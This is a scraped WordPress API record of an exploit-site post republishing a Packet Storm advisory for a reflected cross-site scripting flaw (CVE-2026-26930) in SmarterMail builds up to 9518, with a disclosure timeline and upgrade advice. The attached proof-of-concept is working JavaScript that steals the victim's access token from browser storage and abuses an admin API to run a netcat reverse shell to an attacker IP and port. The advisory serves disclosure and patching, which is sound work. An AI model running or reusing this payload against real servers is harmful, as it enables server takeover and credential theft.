{"id":41162,"date":"2026-02-17T12:46:05","date_gmt":"2026-02-17T12:46:05","guid":{"rendered":"http:\/\/localhost\/?p=41162"},"modified":"2026-02-17T12:46:05","modified_gmt":"2026-02-17T12:46:05","slug":"smartermail-9518-cross-site-scripting","status":"publish","type":"post","link":"https:\/\/zero.redgem.net\/?p=41162","title":{"rendered":"\ud83d\udcc4 SmarterMail 9518 Cross Site Scripting_PACKETSTORM:215790"},"content":{"rendered":"

{“lastseen”:”2026-02-17T18:08:16″,”description”:”SmarterMail versions 9518 and below have an issue where user input passed through the MailboxId GET parameter to the MAPI endpoints is not properly sanitized before being used to generate HTML output. This can be exploited by attackers to perform…”,”published”:”2026-02-17T00:00:00″,”modified”:”2026-02-17T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 SmarterMail 9518 Cross Site Scripting”,”source”:””,”references”:””,”id”:”PACKETSTORM:215790″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2026-26930″],”sourceData”:”—————————————————————————-\\n SmarterMail \\u003c= 9518 (MailboxId) Reflected Cross-Site Scripting Vulnerability\\n —————————————————————————-\\n \\n \\n [-] Software Link:\\n \\n https:\/\/www.smartertools.com\/smartermail\/business-email-server\\n \\n \\n [-] Affected Versions:\\n \\n Build 9518 and prior builds.\\n \\n \\n [-] Vulnerability Description:\\n \\n User input passed through the \\”MailboxId\\” GET parameter to the MAPI\\n endpoints is not properly sanitized before being used to generate HTML\\n output. This can be exploited by attackers to perform Reflected Cross-Site\\n Scripting (XSS) attacks which, in turn, might lead to 1-click Remote\\n Command Execution (RCE) attacks.\\n \\n \\n [-] Proof of Concept:\\n \\n https:\/\/karmainsecurity.com\/pocs\/CVE-2026-26930.html\\n \\n \\n [-] Solution:\\n \\n Upgrade to build 9526 or later.\\n \\n \\n [-] Disclosure Timeline:\\n \\n [26\/01\/2026] – Vendor notified\\n \\n [26\/01\/2026] – Vendor response stating \\”we will get this over to the\\n developers for evaluation\\”\\n \\n [30\/01\/2026] – Vendor released build 9526\\n \\n [03\/02\/2026] – CVE identifier requested\\n \\n [16\/02\/2026] – CVE identifier assigned\\n \\n [16\/02\/2026] – Public disclosure\\n \\n \\n [-] CVE Reference:\\n \\n The Common Vulnerabilities and Exposures project (cve.org) has assigned the\\n name CVE-2026-26930 to this vulnerability.\\n \\n \\n [-] Credits:\\n \\n Vulnerability discovered by Egidio Romano.\\n \\n \\n [-] Original Advisory:\\n \\n https:\/\/karmainsecurity.com\/KIS-2026-04\\n \\n \\n — packet storm attached poc: —\\n \\n \\u003c!–\\n —————————————————————————-\\n SmarterMail \\u003c= 9518 (MailboxId) Reflected Cross-Site Scripting Vulnerability\\n —————————————————————————-\\n \\n author…………..: Egidio Romano aka EgiX\\n mail…………….: n0b0d13s[at]gmail[dot]com\\n software link…….: https:\/\/www.smartertools.com\/smartermail\/business-email-server\\n \\n +————————————————————————-+\\n | This proof of concept code was written for educational purpose only. |\\n | Use it at your own risk. Author will be not responsible for any damage. |\\n +————————————————————————-+\\n \\n [-] Original Advisory:\\n \\n https:\/\/karmainsecurity.com\/KIS-2026-04\\n –\\u003e\\n \\u003cscript\\u003e\\n \\n const VICTIM_URL = \\”http:\/\/smartermail\\”;\\n \\n const XSS = `\\u003cscript\\u003e\\n const ATTACKER_IP = \\”192.168.1.23\\”;\\n const ATTACKER_PORT = \\”4444\\”;\\n \\n fetch(\\”` + VICTIM_URL + `\/api\/v1\/settings\/sysadmin\/AddOrUpdateMount\\”, {\\n method: \\”POST\\”,\\n headers: {\\n \\t\\”Content-Type\\”: \\”application\/json\\”,\\n \\t\\”Authorization\\”: \\”Bearer \\” + Object.values(JSON.parse(localStorage.userTokens))[0].accessToken\\n },\\n body: JSON.stringify({\\n CommandMount: \\”rm \/tmp\/f; mkfifo \/tmp\/f; cat \/tmp\/f | \/bin\/sh -i 2\\u003e\\u00261 | nc \\” + ATTACKER_IP + \\” \\” + ATTACKER_PORT + \\” \\u003e \/tmp\/f\\”,\\n MountPath: \\”RCE\\”\\n })\\n });\\n \\u003c\\\\\/script\\u003e`;\\n \\n location.href = VICTIM_URL + \\”\/mapi\/nspi?MailboxId=\\” + encodeURIComponent(btoa(XSS));\\n \\n \\u003c\/script\\u003e”,”sourceHref”:”https:\/\/packetstorm.news\/download\/215790″,”cvss”:{“score”:7.2,”severity”:”HIGH”,”vector”:”CVSS:3.1\/AV:N\/AC:L\/PR:N\/UI:N\/S:C\/C:L\/I:L\/A:N”,”version”:”3.1″},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/packetstorm.news\/files\/id\/215790\/”,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"

{“lastseen”:”2026-02-17T18:08:16″,”description”:”SmarterMail versions 9518 and below have an issue where user input passed through the MailboxId GET parameter to the MAPI endpoints is not properly sanitized…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[6,8,39,12,15,13,53,7,11,5],"class_list":["post-41162","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-cve","tag-cvss","tag-cvss-72","tag-exploit","tag-high","tag-news","tag-packetstorm","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n\ud83d\udcc4 SmarterMail 9518 Cross Site Scripting_PACKETSTORM:215790 - zero redgem<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/zero.redgem.net\/?p=41162\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"\ud83d\udcc4 SmarterMail 9518 Cross Site Scripting_PACKETSTORM:215790 - zero redgem\" \/>\n<meta property=\"og:description\" content=\"{“lastseen”:”2026-02-17T18:08:16″,”description”:”SmarterMail versions 9518 and below have an issue where user input passed through the MailboxId GET parameter to the MAPI endpoints is not properly sanitized...\" \/>\n<meta property=\"og:url\" content=\"https:\/\/zero.redgem.net\/?p=41162\" \/>\n<meta property=\"og:site_name\" content=\"zero redgem\" \/>\n<meta property=\"article:published_time\" content=\"2026-02-17T12:46:05+00:00\" \/>\n<meta name=\"author\" content=\"invoker\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"invoker\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"3 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=41162#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=41162\"},\"author\":{\"name\":\"invoker\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\"},\"headline\":\"\ud83d\udcc4 SmarterMail 9518 Cross Site Scripting_PACKETSTORM:215790\",\"datePublished\":\"2026-02-17T12:46:05+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=41162\"},\"wordCount\":606,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"keywords\":[\"CVE\",\"CVSS\",\"CVSS-7.2\",\"exploit\",\"HIGH\",\"news\",\"packetstorm\",\"Security\",\"tapic\",\"Vulnerability\"],\"articleSection\":[\"category_exploit\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=41162#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=41162\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?p=41162\",\"name\":\"\ud83d\udcc4 SmarterMail 9518 Cross Site Scripting_PACKETSTORM:215790 - zero redgem\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\"},\"datePublished\":\"2026-02-17T12:46:05+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=41162#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=41162\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=41162#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/zero.redgem.net\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"\ud83d\udcc4 SmarterMail 9518 Cross Site Scripting_PACKETSTORM:215790\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"name\":\"zero redgem\",\"description\":\"\",\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/zero.redgem.net\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\",\"name\":\"zero redgem\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"\",\"contentUrl\":\"\",\"width\":191,\"height\":188,\"caption\":\"zero redgem\"},\"image\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\"}},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\",\"name\":\"invoker\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"caption\":\"invoker\"},\"sameAs\":[\"https:\\\/\\\/zero.redgem.net\"],\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?author=1\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"\ud83d\udcc4 SmarterMail 9518 Cross Site Scripting_PACKETSTORM:215790 - zero redgem","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/zero.redgem.net\/?p=41162","og_locale":"en_US","og_type":"article","og_title":"\ud83d\udcc4 SmarterMail 9518 Cross Site Scripting_PACKETSTORM:215790 - zero redgem","og_description":"{“lastseen”:”2026-02-17T18:08:16″,”description”:”SmarterMail versions 9518 and below have an issue where user input passed through the MailboxId GET parameter to the MAPI endpoints is not properly sanitized...","og_url":"https:\/\/zero.redgem.net\/?p=41162","og_site_name":"zero redgem","article_published_time":"2026-02-17T12:46:05+00:00","author":"invoker","twitter_card":"summary_large_image","twitter_misc":{"Written by":"invoker","Est. reading time":"3 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/zero.redgem.net\/?p=41162#article","isPartOf":{"@id":"https:\/\/zero.redgem.net\/?p=41162"},"author":{"name":"invoker","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca"},"headline":"\ud83d\udcc4 SmarterMail 9518 Cross Site Scripting_PACKETSTORM:215790","datePublished":"2026-02-17T12:46:05+00:00","mainEntityOfPage":{"@id":"https:\/\/zero.redgem.net\/?p=41162"},"wordCount":606,"commentCount":0,"publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"keywords":["CVE","CVSS","CVSS-7.2","exploit","HIGH","news","packetstorm","Security","tapic","Vulnerability"],"articleSection":["category_exploit"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/zero.redgem.net\/?p=41162#respond"]}]},{"@type":"WebPage","@id":"https:\/\/zero.redgem.net\/?p=41162","url":"https:\/\/zero.redgem.net\/?p=41162","name":"\ud83d\udcc4 SmarterMail 9518 Cross Site Scripting_PACKETSTORM:215790 - zero redgem","isPartOf":{"@id":"https:\/\/zero.redgem.net\/#website"},"datePublished":"2026-02-17T12:46:05+00:00","breadcrumb":{"@id":"https:\/\/zero.redgem.net\/?p=41162#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/zero.redgem.net\/?p=41162"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/zero.redgem.net\/?p=41162#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/zero.redgem.net\/"},{"@type":"ListItem","position":2,"name":"\ud83d\udcc4 SmarterMail 9518 Cross Site Scripting_PACKETSTORM:215790"}]},{"@type":"WebSite","@id":"https:\/\/zero.redgem.net\/#website","url":"https:\/\/zero.redgem.net\/","name":"zero redgem","description":"","publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/zero.redgem.net\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/zero.redgem.net\/#organization","name":"zero redgem","url":"https:\/\/zero.redgem.net\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/","url":"","contentUrl":"","width":191,"height":188,"caption":"zero redgem"},"image":{"@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/"}},{"@type":"Person","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca","name":"invoker","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","caption":"invoker"},"sameAs":["https:\/\/zero.redgem.net"],"url":"https:\/\/zero.redgem.net\/?author=1"}]}},"_links":{"self":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/41162","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=41162"}],"version-history":[{"count":0,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/41162\/revisions"}],"wp:attachment":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=41162"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=41162"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=41162"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}